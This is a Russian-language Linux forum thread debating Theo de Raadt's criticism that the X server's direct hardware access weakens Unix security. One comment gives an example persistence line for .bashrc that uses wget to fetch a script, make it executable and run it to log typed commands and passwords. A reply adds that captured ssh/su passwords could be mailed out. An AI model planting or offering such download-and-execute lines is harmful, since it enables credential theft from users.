LINUX.ORG.RU
ФорумTalks

Критика X.org/XFree


0

0

Всё таки хотелось бы узнать, что-нибудь изменилось\изменяется в этом плане за прошедшие 7 месяцев?

http://www.linux.org.ru/jump-message.jsp?msgid=1410139

"Основатель OpenBSD Theo de Raadt в жёсткую критикует разработчиков X.org/XFree за то, что последние создали огромную брешь в безопасности всех Unix систем в связи с тем, что X сервер напрямую работает с железом, а в угоду разработчиков проприетарных драйверов от nVidia и ATI API/ABI интерфейсы уже не меняются десять с лишним лет."

★★

вот не верю, что ты по ночам не спишь из-за того, что какие-то там разработчики "создали огромную брешь в безопасности всех Unix систем в связи с тем, что X сервер напрямую работает с железом, а в угоду разработчиков проприетарных драйверов от nVidia и ATI API/ABI интерфейсы уже не меняются десять с лишним лет."

Pi ★★★★★
() 

      ДВЕ БОЧКИ



   Две Бочки ехали: одна с вином,
   Другая
   Пустая.
   Вот первая себе без шуму и шажком
   Плетется,
   Другая, вскачь несется;
   От ней по мостовой и стукотня, и гром,
   И пыль столбом;
   Прохожий к стороне скорей от страху жмется,
   Ее заслышавши издалека
   Но как та Бочка ни громка,
   А польза в ней не так, как в первой, велика.
   Кто про свои дела кричит всем без умолку,
   В том, верно, мало толку.
   Кто делов* истинно, - тих часто на словах.
   Великий человек лишь громок на делах,
   И думает свою он крепку думу
   Без шуму.

anonymous
()

А тебе бы хотелось что бы он (Х сервер) работал через ж--у? Да и вообще Х сервер не такая уж и важная вещь, чтобы ее ставить на критически важных узлах. Он скорее для ориентирован на юзера.

soomrack ★★★★
()
Ответ на: комментарий от soomrack

>А тебе бы хотелось что бы он (Х сервер) работал через ж--у? Да и вообще Х сервер не такая уж и важная вещь, чтобы ее ставить на критически важных узлах. Он скорее для ориентирован на юзера.

Сюрприз: с десктопов заходят по SSH и т. д. на сервера, так что взлом десктопа админа или программера, который туда заходит, позволяет без особых проблем поиметь серверы. :)

anonymous
()

по-моему Тео вполне аргументированно, на это ответили,
чтобы изменилось _к лучшему_, если кучу кода xorg засунули бы в ядро.

fghj ★★★★★
()
Ответ на: комментарий от Shaman007

>Ты хоть думай, когда пишешь иногда.

А ты иногда думай о смысловой нагрузке твоего поста.

anonymous
()
Ответ на: комментарий от soomrack

>Примеры есть?

Примеров взломов нет. Но если кому-то получится поиметь твой обычный юзерский аккаунт, он запросто может прописать в .bashrc и т. д. все что хочет, включая wget http://free.hosting.com/my_bash && chmod +x my_bash && exec ./my_bash, который будет записывать все твои введенные команды и пароли. :)

anonymous
()
Ответ на: комментарий от anonymous

Кстати, если делаешь ssh/su, он введенный тобой пароль может запросто намылить на свой почтовый ящик. :)

anonymous
()
Ответ на: комментарий от anonymous

По-поводу взлома сервера через влом десктопа админа (звучит-то как!) можно было бы поспорить, но лучше ответьте мне: 1) зачем вообще нужен Х?, 2) если бы такая опасность была РЕАЛЬНОЙ как бы поступили админы и производители этих "дырок"? Оглянитесь, они бегают? Кричат: ааа мы все погибнем! Нас всех хакнут! Глупости.

Х нужен для графики, графика нужна в основном для развлечений, для развлечений нужна быстрая графика, для быстрой графики не нужны постредники.

Если Вы вдруг решите, что без хорошей, но медленной графики вы не можете выполнять свои задачи админ. сервера, то напишите свой Х сервер. Только тогда эта Ваша уверенность должны быть существенно больше чем тот огромный, бесконечный ГЕММОР, который Вы обретете.

soomrack ★★★★
()
Ответ на: комментарий от Pi

спать не мешает, но если иксы лагают, то падает вся система и у меня такое было

jedy ★★
() автор топика
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.
Talks